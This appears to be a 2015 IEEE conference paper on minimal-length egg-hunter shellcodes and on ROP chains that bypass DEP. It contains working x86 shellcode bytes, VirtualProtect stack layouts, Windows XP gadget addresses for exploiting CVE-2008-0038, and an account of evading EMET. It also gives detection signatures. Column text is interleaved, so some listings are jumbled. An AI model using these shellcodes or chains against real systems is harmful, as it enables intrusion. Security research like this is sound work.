SISY 2015 • IEEE 13th International Symposium on Intelligent Systems and Informatics • September 17–19, 2015, Subotica, Serbia
When Every Byte Counts –
Writing Minimal Length Shellcodes
Zoltán L. Németh
University of Szeged
Institute of Informatics
Szeged, Hungary
zlnemeth@inf.u-szeged.hu
Abstract—Against vulnerable binary applications both ethical
and malicious hackers frequently apply an exploitation technique
called egg-hunting. Egg-hunters are small shellcodes whose goal is
to search for a usually longer and less restricted egg that executes
the next phase of the attack. Here, this method is investigated
from several new aspects. First we try to establish the length of
the minimal egg-hunter code under various assumptions. Next,
we study how this technique can be combined with a modern
exploitation technique of return oriented programming (ROP).
Lastly, a brief evaluation is given of both the advantages and
drawbacks of egg-hunting.
I. I NTRODUCTION
Nowadays attacks against binary programs are often rather
complex. Attackers apply several hacking techniques and
exploit various vulnerabilities. E. g., to win the Chromium
Security Reward in 2012 Sergey Glazunov chained together
14 bugs [1]. This also implies that attacks usually occur in
several stages, which means that the progress is gradual. Each
of these steps has a specific goal in the attack-chain like leaking
a certain pointer, writing in an arbitrary memory address and
finally executing the attacker-supplied payload code.
In a restricted environment the exploit development raises
the question of what the length of the shortest “meaningful”
shellcode is. Naturally, it could be a single byte, when the
shellcode is just a RET instruction used, for instance, to turn
off an access control check or an exception handler code. Next,
the attacker could make a short or long jump that takes up 2 or
5 bytes, respectively. E.g., jmp short $ causes an infinite
loop, hence it can be used in denial of service (DoS) attacks.
Someone can also apply a few bytes shellcode to read or set
an address in the memory, and the next shortest shellcodes
are probably the so-called egg-hunters, the main topic of this
article.
During egg-hunting an attacker uses a small shellcode,
called an egg-hunter in order to find and execute a usually
longer and less restricted payload, which will be called an
egg-code. The egg-code can be anywhere in the memory.
This technique is not new. The main general reference [2]
was written by Matt Miller (Skape), which provides a very
clear exposition of the subject. Egg-hunting usually appears in
the advanced part of shellcode development tutorials, e.g. [3]–
[5], to name a few. Egg-hunters are also used in malware [6]
especially in rtf [7] and pdf [8] documents, where the payload
can easily be embedded into the document itself.
978-1-4673-9388-1/15/$31.00©2015 IEEE
Authorized licensed use limited to: London Metropolitan University. Downloaded on March 20,2024 at 13:45:25 UTC from IEEE Xplore. Restrictions apply.
László Erdődi
Óbuda University
Faculty of John von Neumann
Budapest, Hungary
erdodi.laszlo@nik.uni-obuda.hu
Moreover, the basic egg-hunting technique has several
extensions. If the attacker can control more than one buffer,
which are all small, an omelette egg-hunter [9] can be used
to collect, assemble and run the snippets. The integrity of the
egg-code can be checked by the so-called egg-sandwich [10]
method. After being found the egg-code is usually required
to be made executable, e.g. via a VirtualProtect call [11].
Lastly, some egg-hunters are tailored to run in the WoW64
environment [12].
Due to space limitations the egg-hunting method will not
be introduced in detail. The readers not familiar with this
technique are asked to read the paper by Matt Millner (Skape)
[2], where the basics are explained clearly and concisely.
Here, the aim of this paper is to analyse several specific
questions about egg-hunting like the minimal size of the egg-
hunting shellcodes and the memory page protection bypassing
possibilities.
II. M INIMAL L ENGTH E GG - HUNTER S HELLCODES
Evidently, the length of egg-hunters depends on their
functionality and the circumstances of the exploitation.
Functionality first of all means how reliable finding the egg
is. In general 8 bytes or 2 x 4 bytes is enough for the unique
identification of the egg-tag, but in certain cases, especially
when the attacker knows in advance that the egg-tag will be
located not far from the start address of the search, fewer
(1 or 2) bytes may be sufficient. Naturally, performing either
a syscall-based or SEH-based segfault check [2] significantly
increases the code size, hence here and below just blind egg-
hunters as candidates for minimal length shellcodes will be
investigated.
The other important factor is the circumstances, in partic-
ular the environment in which the egg-hunter runs, e.g., the
value of the registers, the content and alignment of the stack,
heap and code segments. If, for example, a register always
contains a fixed value at the point of exploitation, then one
can move that value into the eax register by mov eax,reg
instead of move eax, 0xAABBCCDD, which requires only
2 bytes instead of 5. Next, some examples for small blind
egg-hunters are presented. These examples were created by
incorporating some ideas of other researchers [2], [6].
The first snippet of code called Hunter 1 is a standard blind
egg-hunter that starts the search from the top of the stack using
– 269 –
Z. L. Németh and L. ErdĘdi • When Every Byte Counts – Writing Minimal Length Shellcodes

Hunter 1 Blind egg-hunter – 4-byte egg-tag (12 bytes) are two common methods available to avoid this. First, an
0: 89 e7 mov edi, esp operation can be used, (e.g., inc or dec) on the eax register
2: b8 45 47 47 21 mov eax, 0x21474745; ”EGG!” before using its value as an egg-tag, so in the code one could
7: af scasd write a number one more or one less than the egg-tag. Second,
8: 75 fd jne start+0x7 it is standard practice to look for two consecutive appearances
10: ff e7 jmp edi of the egg-tag. This can be done by Hunter 3. Again, the
egg-tag is “recycled” as code. The search is done in bytes
6–10, but here repe (repeat while equal) is used instead of
a 4-byte egg-tag that may be arbitrary. It seems that in this case repne (repeat while not equal) and one must set ecx to the
the SCASD (SCan A String Double word) instruction is the value of 2 before the cycle, since the code is looking for a
easiest and most succinct way of performing the search. This double appearance of the egg-tag. This is done in bytes 6–7,
also has the advantage of automatically increasing the address but since these two bytes do not run on the first cycle, another
in edi, which implies that jmp edi can be used to start the instruction, namely inc ecx (in byte 4) is needed to ensure
egg-code, hence the egg-tag does not need to be executable. that ZF=0 in order to take the jump in bytes 10–11.
Here and thereafter the direction flag DF is always assumed
To reduce the code length even further, if the attacker can
to be 0, which means a forward search instead of a backward
safely assume that the upper two bytes of ecx are zeros, then
one. Also, the length of this code is just 12 bytes.
the xor ecx, ecx (bytes 2-3) instruction can be deleted,
leading to an additional 2-byte decrease in the code length.
Hunter 2 Blind egg-hunter – 4-byte fixed egg-tag (11 bytes)
0: 89 e7 mov edi, esp
2: 01 f9 add ecx, edi; also resets ZF=0 Hunter 4 Blind egg-hunter – 1-byte egg-tag (9 bytes)
4: b8 f2 af ff e7 mov eax, 0xe7ffaff2 0: 89 e7 mov edi, esp
5: f2 af repne scasd 2: b0 63 mov al, 0x63; arbitrary egg-tag
7: ff e7 jmp edi 4: 49 dec ecx ; also resets ZF=0
9: eb fa jmp start+0x5 5: f2 ae repne scasb
7: ff e7 jmp edi
The next version called Hunter 2 can save one byte by
fixing the egg-tag. If the egg-tag is chosen to be the “egg- Next, the shortest version is Hunter 4. In order to further
hunter core”, i.e., 0xe7ffaff2 (written in the code with reduce the code length here a single byte for egg-tag is applied
little-endian representation as f2-af-ff-e7, bytes 6–9), using the following assumption, which seems to be acceptable
then these data-bytes may be reused as code if the execution in certain situations:
jumps back (bytes 9–10) into the middle of the operation mov
eax, 0xe7ffaff2 after its execution. In order to use the
repne scasd sequence appropriately the attacker must clear 1) A register reg (like esp) contains an address below the
the zero flag and ensure that the count register ecx contains shellcode and there is no unallocated memory between
a value that is large enough. To be precise, ecx must be these addresses.
greater than the distance between the egg’s location and the 2) At the point of exploitation the value of ecx is either zero
start address of the search. Both of these two goals can be or it is greater than the address of the shellcode minus the
achieved by the instruction add ecx, edi, if it is assumed start address given by reg.
that ecx plus the value of esp (possibly after overflow) is 3) The otherwise arbitrary one-byte egg-tag does not appear
large enough (greater than 4096, say, the default length of a between the start address and the beginning of the shell-
memory page). In the rare case when this does not happen, one code.
could replace the addition by subtraction: (2: 29 f9 sub 4) The direction flag DF is zero.
ecx, edi).
From these four conditions the third one has the least
Hunter 3 Blind egg-hunter – 2x4-byte fixed tag (14 bytes) chance of occurring, but this is compensated by the fact that
0: 89 e7 mov edi, esp the egg-tag can be chosen arbitrarily. Furthermore, in byte 3
2: 31 c9 xor ecx, ecx one could change the length of the egg-tag to 2 or 4 bytes, and
4: 41 inc ecx; just to set ZF=0 use the scasw or scasd instruction in byte 6 accordingly.
5: b8 b1 02 f3 af mov eax, 0xaff302b1; EGG! This would increase the length of the code to 11 or 13 bytes,
6: b1 02 mov cl, 0x02; ecx=2 since ch=0 respectively.
8: f3 af repe scasd
In this section some variations of blind egg-hunters of the
; compare [edx] with eax twice
minimal length were realised. It is quite possible that these
10: 75 fa jne start+0x6
“length records” can be improved by using further tricks or
; ZF=0, so jump is taken first time
considering other assumptions in a concrete situation. The
12: ff e7 jmp edi
aim here was just to demonstrate that egg-hunters, especially
the blind ones, can be really short. Therefore one should not
One drawback of the above two versions is that they search underestimate the capability of an attacker that acquired code
for only a single appearance of the egg-tag, thus they might execution even if a severe restriction is applied on the size of
find it in their own code before finding it in the egg. There the code that he can use.

– 270 –
Authorized licensed use limited to: London Metropolitan University. Downloaded on March 20,2024 at 13:45:25 UTC from IEEE Xplore. Restrictions apply.
 SISY 2015 • IEEE 13th International Symposium on Intelligent Systems and Informatics • September 17–19, 2015, Subotica, Serbia

TABLE I. S TACK LAYOUT FOR V IRTUAL P ROTECT.

III. E GG - HUNTING WITH R ETURN O RIENTED
P ROGRAMMING Relative Address Value Explanation
Despite egg-hunting shellcodes being effective and short, 0x0 Address of pop esi gadget Loads the address of Virtu-
one of the biggest limitations of using them is the memory alProtect
page protection. The egg-hunting shellcode is usually placed 0x4 Address of VirtualProtect
on the stack, so memory page protection (e.g. Data Execution 0x8 Address of call esi gadget Calls VirtualProtect
Prevention in the case of Windows) thwarts the attack. 0xc Parameter 1 (lpAddress) Address of stack
0x10 Parameter2 (dwSize) Size of the classic egg-
The most useful technique for bypassing memory page hunting code
protection is the Return Oriented Programming (ROP) [13]. 0x14 Parameter3 (flNewProtect) 0x40 = Write-Execute
Using ROP it is not necessary to inject new attacking code 0x18 Parameter4 (lpflOldProtect)
because the payload of the attack can be created by using 0x1c Address of jmp esp Jumps to stack which is now
already existing code-parts from the loaded libraries in the executable
process memory. A ROP payload consists of so-called gadgets. 0x20 Nop sled
It was shown earlier [14] that Return Oriented Programming
is Turing-complete, which means that arbitrary code can be 0x20 + nops length Classic egg-hunting
written with it like jumps, conditional statements, and cycles. 0x24 + nops length Classic egg-hunting

Using ROP with egg-hunting the attacker has several 0x28 + nops length Classic egg-hunting

options:
A. Applying ROP by turning off the memory page protection be moved to a register. Multiplying it by a certain value, the
(it is possible with several APIs), then executing the egg- stack distance can be set for the two different cases of the
hunting code on the originally protected region; condition. The following ROP program shows how it can be
B. Applying ROP as egg-hunting by condition evaluation and performed in theory (assuming that all the necessary gadgets
cycles; are available). Theoretically the minimum size of the egg-
C. Applying ROP by copying the egg-hunting code to an hunting ROP program is 56 bytes in 32-bit systems; however
executable memory region and launching it. it looks only for a simple 4-byte egg-tag instead of two 4-byte
values. Table II shows the gadgets needed to carry out the task.
A. Egg-hunting after altering memory page protection by ROP
ROP egg-hunting with memory page protection alteration TABLE II. S TACK LAYOUT FOR DIRECT CONDITION EVALUATION .
combines two techniques, namely the memory page protection
Addr. Value Explanation
modification and the classic egg-hunting. First, the memory
page protection has to be turned off for the codepage where 0x0 Address of pop ecx gadget Set the value of the egg-tag in ecx
the egg-hunting shellcode is placed (using e.g. VirtualProtect 0x4 The value of the egg-tag
or VirtualCreate). It is also possible to create a new executable 0x8 Address of pop eax gadget This is the difference on the stack in
bytes between the two branches of
memory region and copy the egg-hunting shellcode there (e.g. the conditions
using HeapCreate + MemCpy). 0xc 0xffffffe0 -32
For the simplest case, the stack layout should look like that 0x10 Address of pop ebx gadget The egg hunting starts using this
address
given in Table I. In this case the address of the VirtualProtect
0x14 Start address - 1
method is placed on the stack with its parameters. The first
0x18 Address of inc ebx gadget The beginning of the cycle, the cycle
parameter is the address of the memory region where the variable is ebx
page protection has to be changed. Now it is treated as 0x1c Address of xor edi, edi gadget Sets edi to zero
a deterministic value (esp+0x18+nops length), but for 0x20 Address of mov edx, ecx gadget Move the egg to a temporary vari-
a general solution obtaining the current stack pointer and able
calculating the place where the classic egg-hunting code is 0x24 Address of sub edx, [ebx] gadget Subtract the value at the current in-
placed would be preferable. dex from the egg. If the egg is there
the result is zero
0x28 Address of neg edx gadget Negate the subtraction. If the egg is
B. ROP egg-hunting by direct condition evaluation found the carry flag is 0, otherwise
it is 1.
Using the full ROP approach it is necessary to execute
0x2c Address of adc edi, edi gadget Copy the carry flag to edi
cycles with ROP. The attacking code has to compare the
0x30 Address of mul edi gadget Set the stack difference, if the egg
value at a given address with the egg-tag pattern for each has found it is 0, otherwise it is -32
step of the search. The classical comparison (cmp x,y je 0x34 Address of add esp, edi gadget Set esp according to the condition
address) formula obviously cannot be used, since the gad- 0x38 Address of mov esp, ebx gadget Set esp to the place where the egg
gets are scattered in the virtual memory, so the je address has found
formula is useless. There are several ways available to execute
condition evaluation in ROP [14], but the classic solution is to
subtract the two values that have to be compared and negate In addition, the given solution has another drawback. It
the result. If the two values are the same the carry flag will applies the blind egg-hunting technique, so if a memory
be zero; otherwise it will be 1. Then with an adc (add with address is not readable at the analysed region then the code
carry) instruction on a zero the value of the carry flag will crashes. Considering the Turing-complete behaviour of ROP,

– 271 –
Authorized licensed use limited to: London Metropolitan University. Downloaded on March 20,2024 at 13:45:25 UTC from IEEE Xplore. Restrictions apply.
Z. L. Németh and L. ErdĘdi • When Every Byte Counts – Writing Minimal Length Shellcodes
checking the readability of a memory address before reading
it with ROP is possible, but obviously it increases the size of
the egg-hunter.
C. ROP egg-hunting by copying the egg-hunting code to an
executable region
The third option that is analysed is the case where the
attack uses a repne scasd jmp edi code in the loaded
executables for the egg-hunting part. If such a code part exists
in the loaded dlls, then the task is only to set the start address
of the hunting to the edi register and the egg to the eax
register with ROP. Directing the execution to the rep scasd
jmp edi code the egg-hunting will be performed. Since we
could not find such a favourable code sequence after analysing
the most frequently uses libraries, the task was changed to
placing this specific code on an executable and writeable
segment. Obviously this is only possible if there is at least one
writeable and executable memory part in the virtual address
space. But this may happen if e.g. a runtime packer (executable
compressor) is used. In this case the stack layout should look
like that given in Table III.
TABLE III. S TACK LAYOUT FOR COPYING THE EGG - HUNTING CODE .
Addr. Value Explanation
0x0 Address of pop eax gadget
0x4 ADDRESS Writeable and executable memory address
0x8 Address of pop ecx gadget
0xc 0xf2affe7 F2 AF (byte code of repne scasd)
FF E7 (byte code of jmp edi)
0x10 Address of mov [eax], ecx
0x14 Address of pop edi gadget
0x18 START Start address of the search
0x1c Address of pop eax gadget
0x20 Egg-tag
0x24 ADDRESS
D. Practical realisation of ROP egg-hunting
Using ROP egg-hunting the attacker has two options when
the egg has found. Jumping directly to the real shellcode in
the memory where the egg has been found is not necessarily a
good solution as this region may also be protected by memory
page protection. The first option is to change the memory
page protection of that region where the real attacking code
is placed using the above mentioned memory page protection
changing APIs (e.g. VirtualProtect). In this case with the first
solution (described in Section A) it means in practice that the
VirtualProtect is called twice: first to enable the execution of
the egg-hunting code and second to enable the execution of
the payload. In this case the data of the stack page protection
modification has to be placed on the stack first, then the
classical egg-hunting follows it and afterwards the data of
another memory page protection modifying function has to be
located on the stack, which points to the place where the real
payload was found by the egg-hunter. Applying this method
with the second or third solution (described in Sections B and
C) VirtualProtect is only called once.
The second option is to write the real payload using
the ROP technique as well. In this case it is sufficient to
relocate the stack to the place where the egg is found after
– 272 –
Authorized licensed use limited to: London Metropolitan University. Downloaded on March 20,2024 at 13:45:25 UTC from IEEE Xplore. Restrictions apply.
Fig. 1. The role of egg-hunting.
DEP ASLR
defence
attack
Egg-hunting ROP, JOP
: imperfect realisation gives opportunity to
: can be used to bypass
the egg-hunting process has ended and the real payload will
be executed as a ROP payload operating on the relocated stack.
As mentioned above, memory page protection can be by-
passed by ROP, but it has a significant drawback. Since it uses
memory addresses from the virtual address space, memory
address randomization can defeat the attack. Though ASLR
can be bypassed in some cases, the ROP egg-hunting technique
has limitations. In the first case (Section A) the attacker has
to know one of the addresses of a memory page protection
changing API function. If ASLR is turned on (usually this is
the case with modern operating systems) the attacker has to
find a loaded library whose location is not randomised (e.g.
the code is not position-independent) and it imports one of the
memory page protection methods. In the second case (Section
B) the attacker has to create the complex ROP payload (with
condition evaluation and jump) using gadgets. For the third
case (Section C), the attacker has to find a memory region
that is writeable and executable.
Moreover, the available gadget catalogue also influences
the practical realisation of the ROP egg-hunting. This may
cause difficulties, especially in the second case, where very
special gadgets are needed.
For the realisation of the different egg-hunting possibilities
with ROP the CVE-2008-0038 LoadAniIcon memory corrup-
tion vulnerability was used. The first version (egg-hunting with
memory page protection changing) can be readily carried out
since it has no special gadget availability requirements. The
third version can be performed as well on the tested system,
since it does not require special gadgets either, but a writeable
executable memory region was needed. For the second version
(egg-hunting with condition evaluation) the gadgets available
limit the possibilities, so additional gadgets had to be used. To
exploit CVE-2008-38 with pure ROP egg-hunting, the gadgets
listed in Table IV were applied.
IV. C ONCLUSIONS
Next, a short evaluation of the the egg-hunting technique
will be given. First and foremost, the egg-hunting attack
method should not be analysed by itself; instead its role in
the overall exploitation process needs to be considered and
investigated.
From this viewpoint it is obvious that the main limitation
of the use of egg-hunting is the precondition that it can only be
 SISY 2015 • IEEE 13th International Symposium on Intelligent Systems and Informatics • September 17–19, 2015, Subotica, Serbia

TABLE IV. G ADGETS FOR CVE-2008-38.

malware:
Address Library Code Explanation
7c972a76 Ntdll.dll Pop ecx Set start address for egg-
AF 75 FD FF E7 (Hunter 1)
(5.1.2600.2180) hunting
7c80991b Kernel32.dll Pop eax Set the egg value F2 AF FF E7 [EB FA] (Hunter 2, Hunter 4)
(5.1.2600.2180)
7c83cf8e Kernel32.dll Inc ecx Increase pointer in every step B1 02 F3 AF 75 FA FF E7 (Hunter 3)
7c82152a Kernel32.dll Sub eax, Compare the current place to
[ecx+0x4] the egg
Besides these signatures, the behaviour of egg-hunters
7c839319 Kernel32.dll Neg eax Set carry flag according to the
condition
(searching consecutive memory addresses in a cycle) typically
7c80991b Kernel32.dll Pop eax Set eax initially for the condi-
causes very high processor usage. This and also both types
tion of segfault avoidance have special characteristics that makes
7c80fd95 Kernel32.dll Adc al, 0x3b Move carry flag to eax detecting egg-hunters possible by using behavioural patterns
7c80e174 Kernel32.dll Pop ebx Zero ebx [6], [19].
7c939d67 Ntdll.dll Add ebx, ecx Save ecx to ebx temporarily In Section III three solutions were presented for egg-
7c972a76 Ntdll.dll Pop ecx Set memory difference hunting that circumvent page execution prevention using ROP.
7c9019e4 Ntdll.dll Mul ecx Set eax 0 or memory differ- The trivial solution was to change the memory page protection
ence based on the condition
with appropriate API calls before executing the egg-hunting
77d7fa8f User32.dll Mov edi, esp Save current esp to edi
(5.1.2600.2180)
code on a protected area. It was also shown that egg-hunting
77d60aca User32.dll Mov esi, edi Save esp to esi
code can be assembled using a pure ROP technique. This
7c8163ce Kernel32.dll Xor edi, edi Zero edi
solution requires condition evaluation and cycle execution with
gadgets, which makes the payload quite long; but it was
7c85935c Kernel32.dll Add edi, ebx Set edi to current address
possible to create it with the available gadgets using the ob-
7c870d33 Kernel32.dll Mov ecx, edi Set ecx back to current ad-
dress served CVE-2008-0038 vulnerability. Besides this, alternative
7c820969 Kernel32.dll Mov edi, eax Set edi to 0 or stack difference solutions are also possible for bypassing DEP such as writing
between the two cases special codes on a writeable executable region by ROP and
7c817d02 Kernel32.dll Add esi, edi Add zero or stack difference executing it.
to the saved esp
7c86baf3 Kernel32.dll Pop edi Set stack difference from the Egg-hunters are extremely versatile tools. Since smaller
point when esp was saved shellcodes are easier to encode, adapt, or transform, they can
7c817d02 Kernel32.dll Add esi, edi Add the stack change to esi be especially useful in the following situations:
7c9011a7 Ntdll.dll Mov esp, esi Set esp according to the con-
dition if the egg has not found • When restrictions are applied on the transmission of
esp will go back to the second the shellcode, e.g., avoidance of bad characters, or the
line, if the egg is found esi
equals to esp
requirement of alphanumeric, venetian [20] or JIT-ed
[21] shellcodes.
• When encoding or packing is necessary in order to
performed if the attacker has already obtained code execution. avoid malware detection, since these transformations
It is known that in a well-secured system, where DEP and usually dramatically increase the code-size.
ASLR defences are routinely applied, this may be hard to
realise. But also note that these two pillars of defence (DEP • When patching (overwriting part of an executable
and ASLR) can only constitute a robust protection if they are program) is applied, e.g. modifying kernerl32.dll by a
perfectly applied. As indicated in Figure 1, even a small defect, MemCpy or WriteProcessMemory calls. During
like loading a single non-ASLR module, the low entropy of this process a short egg-hunter does less harm to the
the randomization (which is typical in Win32 processes), or a original library, so it may remain usable for other
small memory leak [15], makes Return Oriented Programming stages of the exploitation.
(ROP) [13], [16] or Jump Oriented Programming (JOP) [17] • Egg-hunters are easier to transfer or generate dynam-
feasible, which then can be readily used to bypass the DEP ically, e.g., by ROP/JOP chains, as was demonstrated
mitigation. in Section III. A combination of egg-hunting and these
Similarly, if the DEP protection has some weakness, e.g., or other advanced techniques can lead to sophisticated,
the process’ memory contains at least one writeable and targeted attacks.
executable codepage, or a Just in Time (JIT) complier is • The self-containment and independence of kernel API-
applied to place some custom code into the memory [18], then s and libraries (only the syscall-based segfault avoid-
egg-hunting can be used not just to find the shellcode, but also ance use API calls in egg-hunters) involves greater
to perform a general code or address search, and hence evade portability between OS and application versions.
ASLR completely.
• Furthermore, the avoidance of library calls may be a
In Section II it was shown that egg-hunters, especially the crucial feature for bypassing malware mitigation tech-
blind ones can be really small. But such a level of minimality niques like Microsoft Enhanced Mitigation Experience
implies a rigid structure and sometimes the egg-tag has to be Toolkit (EMET) [22]. E.g., we successfully applied
fixed as well. This leads to the following string signatures egg-hunters to evade the Export Address Table Access
which may be useful for detecting these blind egg-hunters in Filtering (EAF) defence of EMET.

– 273 –
Authorized licensed use limited to: London Metropolitan University. Downloaded on March 20,2024 at 13:45:25 UTC from IEEE Xplore. Restrictions apply.
Z. L. Németh and L. ErdĘdi • When Every Byte Counts – Writing Minimal Length Shellcodes
Summing up, egg-hunters should be viewed as small,
staged shellcodes, whose real strength lies in their small code
size, which means there is great scope in exploiting a system
and avoiding mitigation in many cases.
ACKNOWLEDGMENT
The authors wish to thank David P. Curley for checking
the paper from a linguistic point of view.
R EFERENCES
[1] K. Buchanan, Ch. Evans, Ch. Reis, T. Sepez (2012 Jun.) A Tale Of
Two Pwnies (Part 2), Chromium Blog. [Online.] Available: http://blog.
chromium.org/2012/06/tale-of-two-pwnies-part-2.html
[2] Matt Miller (Skape) (2004, Sep.) Safely Searching Process Virtual
Address Space. [Online.] Available: http://hick.org/code/skape/papers/
egghunt-shellcode.pdf
[3] Corelan Team. (2010 Jan.) Exploit writing tutorial part 8: Win32 Egg
Hunting. [Online.] Available: https://www.corelan.be/index.php/2010/
01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/
[4] M. Czumak. (2015, Febr.) Windows Exploit Development –
Part 5: Locating Shellcode With Egghunting, Security Sift Blog
http://www.securitysift.com/windows-exploit-development-part-5-
locating-shellcode-egghunting/
[5] A. Thabet. (2012 Febr.) The Art of Win32 Shellcoding. [On-
line.] Available: http://www.codeproject.com/Articles/325776/The-Art-
of-Win-Shellcoding
[6] A. Abbasi, and J. Wetzel, “APTs way: evading Your EBNIDS,”
Presented at Black Hat Europe 2014, 16-19 Oct 2014, Am-
sterdam, [Online.] Available: https://www.blackhat.com/docs/eu-14/
materials/eu-14-Abbasi-APTs-Way-Evading-Your-EBNIDS-wp.pdf
[7] M. Janus. (2013, Aug.) The curious case of a CVE-2012-
0158 exploit. [Online.] Available: https://securelist.com/analysis/37158/
the-curious-case-of-a-cve-2012-0158-exploit/
[8] D. Liu, H. Wang and A. Stavrou, ”Detecting malicious javascript in
pdf through document instrumentation,” in Dependable Systems and
Networks (DSN), pp. 100-111, IEEE, 2014.
[9] Corelan Team. (2010, Aug.) Exploit notes – win32 eggs-to-
omelet. [Online.] Available: https://www.corelan.be/index.php/2010/08/
22/exploit-notes-win32-eggs-to-omelet/
– 274 –
Authorized licensed use limited to: London Metropolitan University. Downloaded on March 20,2024 at 13:45:25 UTC from IEEE Xplore. Restrictions apply.
[10] M. Czumak. (2015, Febr.) EggSandwich – An Egghunter with In-
tegrity, Security Sift Blog.[Online.] Available: http://www.securitysift.
com/eggsandwich-egghunter-integrity/
[11] Corelan Team. (2011, May.) Hack Notes : Ropping eggs for break-
fast. [Online.] Available: https://www.corelan.be/index.php/2011/05/12/
hack-notes-ropping-eggs-for-breakfast/
[12] Corelan Team. (2011, Nov.) WoW64 Egghunter. [Online.] Available:
https://www.corelan.be/index.php/2011/11/18/wow64-egghunter/
[13] R. Roemer, E. Buchanan, H. Shacham, and S. Savage, “Return-oriented
programming: Systems, languages, and applications,” ACM Transac-
tions on Information and System Security (TISSEC), vol. 15, no. 1, pp.
2, 2012.
[14] H. Shacham, ”The Geometry of Innocent Flesh on the Bone: Return-
into-libc without Function Calls (on the x86),” in CCS 2007, pp. 552–
561, ACM Press, 2007.
[15] K. Z. Snow, F. Monrose, L. Davi, A. Dmitrienko, C. Liebchen and A.-R.
Sadeghi, ”Just-in-time code reuse: On the effectiveness of fine-grained
address space layout randomization”, in Security and Privacy (SP), pp.
574-588, IEEE, 2013.
[16] E. Göktaş, E. Athanasopoulos, M. Polychronakis, H. Bos and G.
Portokalidis, ”Size does matter: Why using gadget-chain length to
prevent code-reuse attacks is hard,” in Proc. 23rd USENIX conference
on Security Symposium, pp. 417-432, USENIX Association, 2014.
[17] S. Checkoway, L. Davi, A. Dmitrienko, A.-R. Sadeghi, H. Shacham
and M. Winandy, ”Return-oriented programming without returns”, in
Proc. ACM conference on Computer and communications security, pp.
559-572, ACM, 2010.
[18] D. Blazakis, ”Interpreter exploitation,” in Proc. USENIX Workshop on
Offensive Technologies (WOOT’10), H. Shacham and C. Miller Eds.,
2010.
[19] J. Khodaverdi, and F. Amin, “A Robust Behavior Modeling for Detect-
ing Hard-coded Address Contained Shellcodes,” International Journal
of Security & Its Applications, vol. 7, no. 5, 2013.
[20] Ch. Anley. (2002, Jan.) Creating Arbitrary Shellcode In Unicode
Expanded Strings, The “Venetian” exploit. [Online.] Available: http:
//www.net-security.org/dl/articles/unicodebo.pdf
[21] A. Sintsov (2010, Mar.) JITed egg-hunter stage-0 shellcode Adjusted
universal for xp/vista/win7. [Online.] Available: https://www.exploit-db.
com/exploits/13649/
[22] Microsoft. Enhanced Mitigation Experience Toolkit (EMET) version
5.2. [Online.] Available: http://www.microsoft.com/emet